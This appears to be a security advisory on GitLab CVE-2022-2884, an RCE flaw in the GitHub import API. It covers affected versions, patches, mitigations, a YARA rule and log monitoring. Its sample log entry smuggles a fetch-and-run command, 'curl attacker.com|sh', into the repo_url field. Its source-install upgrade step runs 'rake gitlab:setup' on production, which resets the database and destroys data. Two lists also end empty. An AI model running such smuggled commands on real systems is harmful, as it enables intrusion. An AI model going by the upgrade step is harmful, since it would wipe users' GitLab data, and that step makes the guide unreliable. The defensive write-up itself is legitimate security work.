Table of Contents
GitLab CVE-2022-2884 is a critical remote code execution vulnerability in GitLab Community and Enterprise Editions. Scoring 9.9 on the CVSS v3.1 scale, this flaw impacts all versions from 11.3.4 through 15.1.4, and select builds up to 15.3.1.
The vulnerability stems from the “Import from GitHub” API endpoint, which can be abused by authenticated low-privileged users to execute arbitrary code on the GitLab server without user interaction.
How the GitHub Import API Enables RCE
The root cause lies in insufficient sanitization of user-supplied input during repository imports from GitHub. Attackers can manipulate repository metadata or import job definitions to inject malicious payloads that GitLab executes during the import process.
Exploitation Flow:
- Authenticated user triggers GitHub import.
- Crafted payload is injected via
repo_urlor metadata fields. - GitLab executes the import job, evaluating input with elevated privileges.
- Result: Remote code execution under the context of the GitLab service account.
This bypasses any UI-based security filters since the attack operates entirely via API calls, making it ideal for automated exploitation.
Affected GitLab Versions and Patch Details
Vulnerable Versions:
- GitLab CE/EE from 11.3.4 up to 15.1.4
- Versions 15.2.0 to 15.2.3
- Versions 15.3.0 to 15.3.1
Fixed Versions:
| GitLab Version Line | Patched Version |
|---|---|
| 15.1.x | 15.1.5 |
| 15.2.x | 15.2.4 |
| 15.3.x | 15.3.2 |
For complete details:
Exploit Analysis and Real-World Risk
The exploit was originally reported via HackerOne in late 2022 and has since resurfaced in pentesting toolkits and exploit archives, including:
Real-World Impact:
- Attackers inside GitLab environments (contractors, red teams, compromised users) can weaponize this to gain shell access.
- GitLab instances exposed to the internet with SSO bypasses or misconfigured auth are highly vulnerable.
- CI/CD environments can be abused to deploy malware or exfiltrate secrets.
Mitigation Strategies and Upgrade Path
Mitigation (If Patch Is Not Possible Immediately):
- Disable GitHub Import feature via
application_settings:
sudo gitlab-rails console
ApplicationSetting.first.update_attribute(:import_sources, [])
- Block access to
/api/v4/import/githubendpoint via WAF or reverse proxy.
Upgrade Path:
Run the following commands for Omnibus installs:
sudo apt-get update
sudo apt-get install gitlab-ee=15.3.2-ee.0
Or for source installs:
sudo git pull origin 15-3-stable
sudo bundle exec rake gitlab:setup RAILS_ENV=production
Detection Rules and Incident Readiness
YARA Rule (Generic):
rule GitLab_CVE_2022_2884_ImportPayload
{
strings:
$s1 = "repo_url=" nocase
$s2 = "import/github" nocase
$s3 = "/api/v4/import/github"
condition:
all of them
}
Log Monitoring (GitLab Logs):
Monitor for suspicious entries in:
production_json.logapi_json.log
Example suspicious log entry:
{
"method": "POST",
"path": "/api/v4/import/github",
"status": 500,
"params": {"repo_url": "evil.com/$(curl attacker.com|sh)"}
}
Suggested Detection Tools:
- GitLab Audit Logs
- Suricata/Snort inline WAFs
- API Gateway inspection (AWS API Gateway, Kong)
Conclusion
The GitLab CVE-2022-2884 vulnerability is a high-impact RCE flaw that continues to pose a threat, especially in organizations that haven’t patched older GitLab CE/EE deployments. Despite its 2022 discovery, many environments still lack proper remediation or monitoring.
Teams should urgently patch, monitor for IOCs, and restrict API access until full mitigation is applied. Given the attack only requires a low-privilege authenticated user, this vulnerability should be treated as an active insider threat vector.